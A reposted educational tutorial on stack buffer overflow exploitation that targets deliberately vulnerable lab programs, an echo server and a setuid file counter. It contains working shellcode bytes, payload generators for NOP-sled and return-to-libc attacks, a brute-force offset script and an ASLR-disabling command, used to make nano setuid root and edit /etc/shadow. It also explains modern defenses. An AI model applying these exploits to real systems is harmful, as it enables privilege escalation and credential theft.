[转] Buffer Overflows and You (下)

Got root?

Gentlemen, we can root it. We have the technology. We have the capability to root yet another poor idiot's server on the int4rw3bs. Steve Austin will be that man. Better than he was before. Better, stronger, faster, errrr...

We spent all that time developing a small bit of shellcode. Let's put it to good use. Suppose we have the program provided here. It's a simple echo server, whatever you send it, it sends back to you.

$ gcc -fno-stack-protector -z execstack -o server server.c
$ ./server 5000

Then in another terminal...

$ telnet
telnet> open 127.0.0.1 5000
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Hello
Hello
Hi
Hi

But this program has an error in it. If we look at the source code, we see that the buffer being used is 512 bytes. But, when recv() is called, we specify a buffer size of 1024 bytes. Ruh Roh. Back in our telnet session...

Hi
Hi
12456789012456789012456789012456789012456789012456789012456789012456789012456789
01245678901245678901245678901245678901245678901245678901245678901245678901245678
90124567890124567890124567890124567890124567890124567890124567890124567890124567
89012456789012456789012456789012456789012456789012456789012456789012456789012456
78901245678901245678901245678901245678901245678901245678901245678901245678901245
67890124567890124567890124567890124567890124567890124567890124567890124567890124
56789012456789012456789012456789012456789012456789012456789012456789012456789012
4567890124567890124567890124567890124567890124567890124567890124567890
Connection closed by foreign host.

And the server spits out...

send: Bad file descriptor
Segmentation fault (core dumped)
$

Gee whiz, I think we just trampled over all of the local variables, the saved frame pointer, and the return address. Well this looks promising!

For demonstration purposes, let's assume we also have a local account on the machine that the server is running on, and that the server is running as root so it can bind to a port below 1024. Since we have local access to the machine, instead of turning the server into a shell like we did in the Shellcode section, we could instead simply set "/bin/sh" setuid root. This means that the shell will always run as the user root, instead of an unprivileged user.

Sounds nice in theory, but many binaries have protections against running setuid. [5] /bin/bash (which /bin/sh is symlinked to on many systems) will not run as root if the real uid is not root. Fine. How about /bin/nano? That program will happily run as root (/bin/vi will not, otherwise we'd use that).

Finally, it's important to realize that attacks are still possible without local access - you just need slightly more complicated shellcode that spawns the shell and binds it to an open socket.

New "shellcode"

Anyway, we want a program like this...

#include <sys/stat.h>

int main() {
  chmod("/bin/nano", 04755);
}

chmod is also a system call (or, more precisely the wrapper provided by libc). Using the same process described in the Shellcode section, the end assembly that we come up with is this...

__asm__(
"mov    $0x11111111111119c9,%rsi\n\t" // arg 2 = 04755
"shl    $0x30,%rsi\n\t"
"shr    $0x30,%rsi\n\t"               // first 48 bits = 0
"mov    $0x111111111111116f,%rdi\n\t"
"shl    $0x38,%rdi\n\t"
"shr    $0x38,%rdi\n\t"
"push   %rdi\n\t"
"mov    $0x6e616e2f6e69622f,%rdi\n\t" // generate "/bin/nano"
"push   %rdi\n\t"                     // and push it onto the stack
"mov    %rsp,%rdi\n\t"                // arg 1 = stack ptr = start of "/bin/nano"
"mov    $0x111111111111115a,%rax\n\t"
"shl    $0x38,%rax\n\t"
"shr    $0x38,%rax\n\t"               // syscall number = 90
"syscall\n\t"
);

And the actual payload is...

\x48\xbe\xc9\x19\x11\x11\x11\x11\x11\x11\x48\xc1\xe6\x30\x48\xc1\xee\x30\x48\xbf
\x6f\x11\x11\x11\x11\x11\x11\x11\x48\xc1\xe7\x38\x48\xc1\xef\x38\x57\x48\xbf\x2f
\x62\x69\x6e\x2f\x6e\x61\x6e\x57\x48\x89\xe7\x48\xb8\x5a\x11\x11\x11\x11\x11\x11
\x11\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05

Tips and tricks

Okay, now we have a few problems. First of all, we have no idea where in memory this buffer is. But we have the source code, and we have access to the machine. So we can make an educated guess.

There are also a couple of tricks that we can play to improve our odds. The first trick improves our chances of overwriting the return address. We can accomplish this simply by repeating the new return address at the end of the payload a fair number of times. That way everything above the payload is overwritten with the new return address, and you're pretty much guaranteed to hit the actual return address. Now, there are alignment issues here so if you don't get it right the first time you may need to move the starting address by one byte (or two or three, or four, or five, or six, or seven).

The second trick we can play reduces the accuracy required for our new return address. Normally we would need to precisely point the return address at the start of our payload. But, what if our payload has a bunch of NOOPs in the beginning? As long as we land somewhere in this "NOOP sled" [6] the payload will correctly execute. So if you recall the stack layout from earlier, we want to transform it into the second image...

Delivery

Okay, let's get on with it. First add a printf() call to server.c that dumps the address of buf.

printf("buf ended up at %p\n", buf);

The output will be something like this (the address will invariably be different)...

buf ended up at 0x7fffffffe1a0

Alright. Let's write a program to deliver our payload, called send.c. You can see the entire program here. It's straightforward. All it does is connect to the specified port, and send the payload. The code that generates the payload can be seen here:

  ret += atoi(argv[2]);

  [...]

  /* NOOP sled */
  memset(buf, 0x90, 384);

  /* Payload */
  memcpy(buf+384, payload, sizeof(payload));

  /* Remaining buffer */
  addr = (long) buf+384+sizeof(payload);

  /* 8-byte align the return addresses */
  while (addr % 8 != 0) addr++;

  /* Repeat return address for rest of buf */
  for (i = 0; i < (sizeof(buf)-384-sizeof(payload)-8)/8; i++) {
    *(((long *)addr)+i) = ret;
  }

You can see we first add an offset to the return address, you'll discover why below. After that we take our 768 byte buffer and build it up starting with 384 bytes of NOOPs, followed by the actual payload, followed by our calculated return address repeated until the end of the buffer.

So, if we startup the server as root on port 1023...

[root@localhost ~]# ./server 1023

And then run our program...

$ ./send 1023 100

We can see the server is dead, but we didn't have any success with /bin/nano...

Connected to 127.0.0.1
send: Bad file descriptor
Segmentation fault (core dumped)
[root@localhost ~]# ls -l /bin/nano
-rwxr-xr-x. 1 root root 177328 2009-11-18 12:54 /bin/nano

Well now it's basically a matter of trial and error. The buffer isn't located at precisely the same place when run as root for one simple reason, the environment variables. Recall our original stack layout...

Since the environment variables generally change from account to account, system to system, we have to guess an offset. Our NOOP sled gives us some leniency in this guessing, so if we start going at 300 byte increments eventually we'll stumble on the proper offset. For our example system the offset happens to be anywhere around 900...

Victory

$ ./send 1023 900
$ ls -l /bin/nano
-rws--x--x. 1 root root 177328 2009-11-18 12:54 /bin/nano
$ nano /etc/shadow
  GNU nano 2.0.9             File: /etc/shadow

root:$1$vH1c/O5N$oA0VKFanh6OvM37AJ7BFR/:14725:0:99999:7:::
bin:*:13878:0:99999:7:::
daemon:*:13878:0:99999:7:::
adm:*:13878:0:99999:7:::
lp:*:13878:0:99999:7:::
sync:*:13878:0:99999:7:::
shutdown:*:13878:0:99999:7:::
halt:*:13878:0:99999:7:::
mail:*:13878:0:99999:7:::
news:*:13878:0:99999:7:::
uucp:*:13878:0:99999:7:::
operator:*:13878:0:99999:7:::
                               [ Read 48 lines ]
^G Get Help  ^O WriteOut  ^R Read File ^Y Prev Page ^K Cut Text  ^C Cur Pos
^X Exit      ^J Justify   ^W Where Is  ^V Next Page ^U UnCut Text^T To Spell

That's right, we have write access to /etc/shadow now. If you're not sure what to do at this point, well ... . .. ..

That said, we kind of glossed over an important fact. Every time we tried the exploit and failed, the server segfaulted. Most systems will log this event, and it won't take long for the administrator to figure out what's going on. Also, every time the server dies it must be restarted - this in itself isn't a big hurdle, if it's a relatively important service there may easily be a crontab that restarts it every 10 minutes or something. And looking back, it only took 3 or 4 attempts to get it right.

The main concern is almost certainly the segmentation faults. We can get around this by adding an exit() syscall to the end of our payload. This is a very simple thing to do, and the exercise is left to the reader.

Modern defenses

Everything has been pretty cool up to this point. Sadly, it's time for reality. The attacks that we just talked about can no longer happen on modern systems. There are three reasons for this...

NX and Exec Shield

Modern architectures provide a "No eXecute" bit, which allows you to mark certain regions of memory as non-executable. If the stack is marked in this way, it is impossible to run shellcode that has been injected into a buffer on the stack. That said, you may be able to get around this by overflowing a heap buffer (but heaps are almost always non-executable now too) or by using a return-to-libc-style attack.

On older architectures that do not provide the NX bit, there is something called "exec shield," found on many Red Hat systems. It emulates the NX bit on systems that do not have hardware support for it. Other systems accomplish the same thing, just with a different name. Even newer versions of windoze have support for software emulation of the NX bit, called "Data Execution Prevention" (DEP).

If you recall from earlier, we actually turned this off for our programs. This can be accomplished by setting a flag in the actual binary (we can also shut it off system-wide, but there's really no reason to). You can use "execstack" to set the flag on existing binaries, or, if you're compiling a new binary you can pass the "-z execstack" flag on to gcc.

gcc StackGuard

gcc by default also adds extra code to programs to protect against buffer overflows in general. This extra code adds "special" values called canaries before and after the return address and checks to make sure they haven't been overwritten before proceeding to execute a return. We disable it by including the "-fno-stack-protection" when compiling.

Address space layout randomization (ASLR)

Let's take our sample program from the introduction, sample1, and run it a couple of times while looking at each memory map...

$ pmap 12662
12662:   ./sample1
0000000000400000      4K r-x--  /home/turkstra/src/cs526/sample1
0000000000600000      4K rw---  /home/turkstra/src/cs526/sample1
00000032e7000000    120K r-x--  /lib64/ld-2.11.1.so
00000032e721d000      4K r----  /lib64/ld-2.11.1.so
00000032e721e000      4K rw---  /lib64/ld-2.11.1.so
00000032e721f000      4K rw---    [ anon ]
00000032e7400000   1468K r-x--  /lib64/libc-2.11.1.so
00000032e756f000   2048K -----  /lib64/libc-2.11.1.so
00000032e776f000     16K r----  /lib64/libc-2.11.1.so
00000032e7773000      4K rw---  /lib64/libc-2.11.1.so
00000032e7774000     20K rw---    [ anon ]
00007f314ab04000     12K rw---    [ anon ]
00007f314ab28000     12K rw---    [ anon ]
00007fff06c3d000     84K rw---    [ stack ]
00007fff06d19000      4K r-x--    [ anon ]
ffffffffff600000      4K r-x--    [ anon ]
 total             3812K

$ pmap 12666
12666:   ./sample1
0000000000400000      4K r-x--  /home/turkstra/src/cs526/sample1
0000000000600000      4K rw---  /home/turkstra/src/cs526/sample1
00000032e7000000    120K r-x--  /lib64/ld-2.11.1.so
00000032e721d000      4K r----  /lib64/ld-2.11.1.so
00000032e721e000      4K rw---  /lib64/ld-2.11.1.so
00000032e721f000      4K rw---    [ anon ]
00000032e7400000   1468K r-x--  /lib64/libc-2.11.1.so
00000032e756f000   2048K -----  /lib64/libc-2.11.1.so
00000032e776f000     16K r----  /lib64/libc-2.11.1.so
00000032e7773000      4K rw---  /lib64/libc-2.11.1.so
00000032e7774000     20K rw---    [ anon ]
00007fbbe2954000     12K rw---    [ anon ]
00007fbbe2978000     12K rw---    [ anon ]
00007fff261f5000     84K rw---    [ stack ]
00007fff26282000      4K r-x--    [ anon ]
ffffffffff600000      4K r-x--    [ anon ]
 total             3812K

Notice how the address of the stack keeps changing? Well this is the final nail in the coffin. If the stack is no longer executable, we must rely on return-to-libc style attacks, and those almost always rely on knowing where to find a particular function (like system()) as well as a string to pass that function (eg, "/bin/sh"). With the stack's location randomized, the location of that string changes every time the program executes. This makes attacks much more difficult, particularly if the randomization is being done properly.

It's worth noting that ASLR only works in the context of a non-executable stack. If the stack is executable it's usually possible (as we did in the previous example) to develop a payload that does not strictly rely on any fixed addresses.

return-to-libc attack

Things have hopefully been enlightening up to this point, although probably a bit disappointing after reading the defenses section. That said, none of the protections listed are perfect. In this section we will look at the scenario in which the stack has been marked non-executable (and the heap, and anywhere else considered unusual).

ASLR does need to be turned off, however, so be sure to execute the following as root, if you haven't already:

echo 0 > /proc/sys/kernel/randomize_va_space

We start with a small cop-out. As was revealed in an earlier section, x86_64 Linux systems use registers to pass many if not all of their arguments. It is considerably more difficult (though still not impossible) to get values into registers than it is onto the stack, as one might guess. So for this section we're going to deal with programs compiled for a 32-bit environment. When running on this architecture, Linux uses the stack to pass parameters instead of registers. We can still use our 64-bit machine (it is backwards compatible, after all), we'll just need to use the "-m32" compiler flag.

The program

To start with, let's assume we have the following vulnerable program, and that it runs setuid root. It also has stack execution disabled. You can get the program here. It simply counts the occurrences of a specified character in a file.

[root@localhost tmp]# gcc -m32 -fno-stack-protector -o count count.c
[root@localhost tmp]# chmod 4755 count

So as an unprivileged user, we can run the program and it works fine (but remember, the program itself is running as root)...

$ /tmp/count ./count.c a
./count.c contains 18 occurrences of a
$ dd if=/dev/urandom of=bigfile bs=1 count=2048
2048+0 records in
2048+0 records out
2048 bytes (2.0 kB) copied, 0.0238982 s, 85.7 kB/s
$ /tmp/count ./bigfile a
Segmentation fault
$

So if you look at the source you can see once again there is a mistake leaving the program vulnerable to an overflow attack. The buffer is 512 bytes, while the fread() call is willing to read up to 1024 bytes.

The payload

Okay then, let's start with our chmod() code from the last attack.

#include <sys/stat.h>

int main() {
  chmod("/bin/nano", 04755);
}

If we compile this and disassemble main, we end up with this...

$ gcc -m32 -o mychmod mychmod.c
$ gdb mychmod
GNU gdb (GDB) Fedora (7.0.1-44.fc12)
Reading symbols from /home/turkstra/mychmod...(no debugging symbols found)...done.
(gdb) disassemble main
Dump of assembler code for function main:
0x080483c4 <main+0>:    push   %ebp
0x080483c5 <main+1>:    mov    %esp,%ebp
0x080483c7 <main+3>:    and    $0xfffffff0,%esp
0x080483ca <main+6>:    sub    $0x10,%esp
0x080483cd <main+9>:    movl   $0x9c9,0x4(%esp)
0x080483d5 <main+17>:   movl   $0x80484b4,(%esp)
0x080483dc <main+24>:   call   0x80482f4 <chmod@plt>
0x080483e1 <main+29>:   leave
0x080483e2 <main+30>:   ret
End of assembler dump.
(gdb) break main
Breakpoint 1 at 0x80483c7
(gdb) run
Starting program /home/turkstra/mychmod
Breakpoint 1, 0x080483c7 in main ()
(gdb) print chmod
$1 = {<text variable, no debug info>} 0x6f37f0 <chmod>

This should look familiar, and relatively straightforward. We can see the arguments for chmod being pushed in reverse order onto the stack, followed by a call to chmod. Actually, since we didn't use -static, the call is indirect. It goes through a jump table, which allows the shared library to be loaded anywhere in memory without having to recompile the main program. The loader simply sets up the correct values in the jump table on startup. We can find the location of the real chmod by printing the symbol after the program has started. It ends up being 0x6f37f0.

Our payload seems simple this time - we just need the two arguments, the file mode and the address of the string "/bin/nano", followed by the address of the function to call (chmod). Except this time we cannot use our little trick of pushing "/bin/nano" onto the stack (we can't execute any instructions of our own).

Well, one way to get around this particularly if the program is being run locally is to place the string into an environment variable. Suppose we have this simple program:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[], char *envp[]) {
  int i = 0;

  while (envp[i]) {
    if (strcmp(envp[i], "BAH=/bin/nano") == 0)
      printf("Found BAH=\"/bin/nano\" at %p\n", envp[i]);
    i++;
  }

  return 0;
}

We can then set an environment variable containing "/bin/nano" and run it...

$ export BAH="/bin/nano"
$ gcc -m32 -o findnano findnano.c
$ ./findnano
Found BAH="/bin/nano" at 0xffffdf12

And it should roughly be at that location for every program that runs. Roughly because depending on the environment variables (which include the name of the binary and its path) it may shift around a few bytes. Cool. Well, now we have everything we need. We just need to develop a file that delivers our payload. Take a look at gen.c. The parts of interest are below...

  /* Garbage to fill the buffer */
  memset(buf, 0x61, 512);

  /* Local vars */
  memset(buf+512, 0x01, 28);

  /* Return address */
  addr = (long) buf + 512 + 28;
  *((long *)addr) = 0x6f37f0;

  /* Args */
  addr = (long) buf + 512 + 28 + 8;
  *((long *)addr) = 0xffffdf10 + atoi(argv[2]);
  addr = (long) addr + 4;
  *((long *)addr) = 0x9c9;

You can see that we set the return address to be the starting address of chmod, and then proceed to place the arguments onto the stack. But how did we find those offsets? Easy, if we open count in gdb and disassemble main, we can see in the prelude...

0x08048484 <main+0>:    push   %ebp
0x08048485 <main+1>:    mov    %esp,%ebp
0x08048487 <main+3>:    and    $0xfffffff0,%esp
0x0804848a <main+6>:    sub    $0x220,%esp

The "sub $0x220,%esp" allocates space for our local variables. 0x220 in decimal is 544. The somewhat complicated catch here is that the "and $0xfffffff0,%esp" instruction above is masking off the lower 16 bits of ESP (corresponding to 8 bytes) to save the return address and base pointer. So, we actually want our return address to be at an offset of 540. Recall when the function returns, ESP will be restored to its original value, so the arguments to chmod must be located 548 bytes above the buffer.

If you didn't know any of this, you could still figure it out. It would just take some experimenting to discover the proper values. A helpful way to see what is going on is to recompile count.c and include the stack walking function from earlier. Using that you can play around until the stack looks correct, and then go from there.

The exploit

As was mentioned earlier, the "/bin/nano" string will shift around depending on the environment variables. That's why our program above allows us to specify an offset to add to its address. At this point it is probably worthwhile to make sure that what we have works. We can use strace to run the count program (it will run unprivileged) and see if we at least end up invoking chmod...

$ gcc -o gen gen.c
$ ./gen bah 0  # Generate the payload
$ strace ./count bah a
[...]
write(1, "Found 16843009 occurrences of \1\n", 32Found 16843009 occurrences of ?) = 32
chmod("QTLIB=/usr/lib64/qt-3.3/lib", 04711) = -1 ENOENT (No such file or directory)
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV +++
Segmentation fault
$

Excellent. It invoked chmod. The first argument is obviously wrong, but this is where the guesswork comes in. We can write a script that will generate payloads with various addresses and run them against the vulnerable program...

#! /bin/bash

for I in {0..60}; do
  ./gen bah ${I}
  ./count bah a
  ls -l /bin/nano | grep rws > /dev/null
  if [[ $? == 0 ]]; then
    echo "offset was ${I}"
    break;
  fi
done

This will try up to 60 different addresses for "/bin/nano"

$ ls -l /bin/nano
-rwxr-xr-x. 1 root root 177328 2009-11-18 12:54 /bin/nano
$ ./runit
Found 16843009 occurrences of $ ls -l /bin/nano

./runit: line 3: 16775 Segmentation fault      ./count bah a
[...]
Found 16843009 occurrences of $ ls -l /bin/nano

./runit: line 3: 16896 Segmentation fault      ./count bah a
offset was 41
$ ls -l /bin/nano
-rws--x--x. 1 root root 177328 2009-11-18 12:54 /bin/nano

And as you can see, 60 is more than enough. Once again we are now able to write to /etc/shadow using nano. Mission accomplished.

Conclusion

That's about it, for now. While these attacks are more difficult, if not impossible, on modern systems there are still a number of older systems out there that are vulnerable to attacks like these. There are also a number of cases where modern systems have these protections turned off, either for a single application simply because it does things in a way that requires more leniency or system-wide due to incompetent system administration.

"Never underestimate the power of somebody with source code, a text editor, and the willingness to totally hose their system." - Rob Landley

Any feedback related to the site is appreciated - particularly if there are any errors or you feel something could be reworded to be more easily understood. Simply contact jeff@turkstra.net.

More information about the author can be found on TurkeyLand!

References

[1] W. Holzmann, "Memory Layout (Virtual address space of a C process," www.cs.uleth.ca. [Online]. Available: http://www.cs.uleth.ca/~holzmann/C/system/memorylayout.pdf. [Accessed: Apr. 5, 2010].

[2] Wikipedia, the free encyclopedia, "x86 calling conventions," Wikimedia Foundation. [Online]. Available: http://en.wikipedia.org/wiki/X86_calling_conventions. [Accessed: Apr. 30, 2010].

[3] G. Bugher, "OS-Based Mitigations Against Common Attacks," Perimiter Grid. [Online]. Available: http://perimetergrid.com/wp/2008/02/04/os-based-mitigations-against-common-attacks/. [Accessed: Apr. 30, 2010].

[4] A. One, "Smashing the Stack for Fun and Profit," Phrack, vo. 7, no. 49, Aug. 11, 1996. [Online]. Available: Phrack, http://www.phrack.com/issues.html?issue=49&id=14. [Accessed Mar. 29, 2010].

[5] Wikipedia, the free encyclopedia, "setuid," Wikimedia Foundation. [Online] Available: http://en.wikipedia.org/wiki/Setuid. [Accessed: Apr. 30, 2010].

[6] Wikipedia, the free encyclopedia, "Buffer overflow," Wikimedia Foundation. [Online]. Available: http://en.wikipedia.org/wiki/Buffer_overflow#NOP_sled_technique. [Accessed: Apr. 30, 2010].

[7] c0ntex, "Bypassing non-executable-stack during exploitation using return-to-libc," infosecwriters.com. [Online]. Available: http://www.infosecwriters.com/text_resources/pdf/return-tolibc.pdf. [Accessed: Mar. 29, 2010].

From:http://turkeyland.net/projects/overflow/references.php